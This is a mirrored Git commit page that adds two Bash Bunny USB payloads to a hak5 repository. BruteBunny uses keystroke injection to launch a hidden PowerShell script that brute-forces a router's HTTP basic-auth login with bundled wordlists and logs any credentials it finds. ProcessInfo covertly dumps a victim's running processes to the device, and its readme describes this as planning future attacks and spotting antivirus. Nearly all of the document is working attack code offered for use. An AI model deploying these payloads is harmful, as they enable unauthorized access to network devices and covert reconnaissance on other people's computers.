hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Added BruteBunny and ProcessInfo payloads (#140)

Browse Source
This commit is contained in:
DeeKoy 2017-04-07 01:01:37 -04:00 committed by Sebastian Kinne
parent fc1d812d96
commit 945b5c14d9
7 changed files with 240 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

72
payloads/library/BruteBunny/brutebunny.ps1 Normal file
View File

@ -0,0 +1,72 @@
<#
.SYNOPSIS
BruteBunny 1.0
.AUTHOR
Decoy. Thanks to nishang for original script inspiration.
.DESCRIPTION
This script is designed to Brute Force common usernames/passwords for the router (http basic authentication)
#>
$Protocol = "http"
$Hostname = "192.168.1.1"
$Port = 80
$Bunny = (gwmi win32_volume -f 'label="BashBunny"' | Select-Object -ExpandProperty DriveLetter)
$UsernameList = $Bunny+"\BruteBunny\wordlists\usernames.txt"
$PasswordList = $Bunny+"\BruteBunny\wordlists\passwords.txt"
$StopOnSuccess = $true
$url = $Protocol + "://" + $Hostname + ":" + $Port + "/"
# Read in lists for usernames and passwords
$Usernames = Get-Content $UsernameList
$Passwords = Get-Content $PasswordList
# Does a depth first loop over usernames first, trying every password for each username sequentially in the list
:UNLoop foreach ($Username in $Usernames)
{
# Loops through passwords in the list sequentially
foreach ($Password in $Passwords)
{
# Starts a new web client
$WebClient = New-Object Net.WebClient
# Sets basic authentication credentials for web client
$SecurePassword = ConvertTo-SecureString -AsPlainText -String $Password -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $Username, $SecurePassword
$WebClient.Credentials = $Credential
Try
{
# Prints the target
$url | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
# Prints the credentials being tested
$message = "Checking $Username : $Password" | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
$message | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
$content = $webClient.DownloadString($url) | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
# Continues on to print succesful credentials
$success = $true
#$success
if ($success -eq $true)
{
# Prints succesful auths to highlight legit creds
$message = "[*] Match found! $Username : $Password" | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
$message | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
$content | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
if ($StopOnSuccess)
{
break UNLoop
}
}
}
Catch
{
# Print any error we receive
$success = $false
$message = $error[0].ToString() | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
$message | Out-File -Append $Bunny\BruteBunny\loot\log.txt -width 250
}
}
}

9
payloads/library/BruteBunny/passwords.txt Normal file
View File

@ -0,0 +1,9 @@
admin
Admin
adm
Adm
administrator
Administrator
administrador
Administrador
root

44
payloads/library/BruteBunny/payload.txt Normal file
View File

@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: BruteBunny
# Author: Decoy
# Version: 1.0
# Category: Password Recovery
# Target: Windows XP SP3+
#
# Description: Will attempt to bruteforce common router username/password combinations in an attempt to gain
# access to the admin panel.
# init
LED R B
# need SWITCH_POSITION, so give it to me. please. thank you.
source bunny_helpers.sh
# set up the things to make it do stuff
mkdir -p /root/udisk/BruteBunny/loot
mkdir -p /root/udisk/BruteBunny/wordlists
# move wordlists to BruteBunny folder
cp /root/udisk/payloads/$SWITCH_POSITION/usernames.txt /root/udisk/BruteBunny/wordlists/usernames.txt
cp /root/udisk/payloads/$SWITCH_POSITION/passwords.txt /root/udisk/BruteBunny/wordlists/passwords.txt
sync;sleep 1;sync
# set attack mode
ATTACKMODE HID STORAGE
# wait for storage
LED R G B 100
QUACK DELAY 6000
QUACK GUI r
QUACK DELAY 100
# unleash the brute bunny
LED B 100
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"
QUACK ENTER
sleep 10
# sync the stuff
sync;sleep 1;sync
LED G

35
payloads/library/BruteBunny/readme.md Normal file
View File

@ -0,0 +1,35 @@
# BruteBunny
* Author: Decoy
* Version: Version 1.0
* Target: Windows
## Description
I would say that some (most) people don't realize that devices they connect to their networks usually have
weak default usernames and passwords. The Brute Bunny will exploit that in hopes of finding some poor sap
who didn't change their admin password for their device, and educate them accordingly.
## Configuration
Modify the variables in brutebunny.ps1 to change the default IP/Port for this attack. Feel free to use your
own wordlists as well; however you will need to adjust some of the sleep times accordingly depending on the
length of time your list will take to go through.
## Notes
This was designed and tested on a Netgear Nighthawk Router, and an Arris Xfinity Modem/Router combo; however
I don't see why it couldn't be used for any internet connected device that uses basic http authentication.
And please... Don't feed the bunnies.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Purple | Reticulating splines |
| White (blinking) | Waiting for Storage |
| Blue (blinking) | Brute Bunny being a Brute Bunny |
| Green | Hopefully no bunny babies |
## Discussion
Not yet

9
payloads/library/BruteBunny/usernames.txt Normal file
View File

@ -0,0 +1,9 @@
admin
Admin
adm
Adm
administrator
Administrator
administrador
Administrador
root

41
payloads/library/ProcessInfo/payload.txt Normal file
View File

@ -0,0 +1,41 @@
#!/bin/bash
#
# Title: Process Info
# Author: Decoy
# Version: 1.0
# Category: Recon
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, Storage
#
#
# Amber Blink Fast.....Initialization
# Amber................Begin
# White Blinking... ...Moving loot to mass storage
# Blue Blinking........Syncing File System
# Green................Finished
# Initialization
LED R G 100
# Create loot directory
mkdir -p /root/udisk/loot/ProcessInfo
# Runs minimized powershell gathering process information for potential future attack vectors
LED R G
ATTACKMODE HID STORAGE
QUACK DELAY 6000
QUACK GUI r
QUACK STRING "powershell -NoP -NonI -W Hidden"
QUACK ENTER
QUCK DELAY 1000
QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"
QUACK ENTER
LED R G B 100
sleep 3
# Sync File System
LED B 100
sync; sleep 1; sync
# Trap is clean
LED G

30
payloads/library/ProcessInfo/readme.md Normal file
View File

@ -0,0 +1,30 @@
# Process Info for Bash Bunny
* Author: Decoy
* Version: Version 1.0
* Target: Windows
## Description
This is just a quick and dirty payload to return all running processes under the current user.
This will return the path/filename/version, and quite a bit of other info as well. This information
can be useful for planning future attacks, such as taking advantage of buffer overflows, and other
various vulnerabilities to gain a more permanent foothold into a target system. It can also be
useful in identifying what AV is in use on a target system.
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber (blinking) | Setting up |
| Amber | Attack running |
| White (blinking) | Moving loot to mass storage |
| Blue (blinking) | Syncing File System |
| Green | Trap is clean |
## Discussion
https://forums.hak5.org/index.php?/topic/40605-payload-process-info/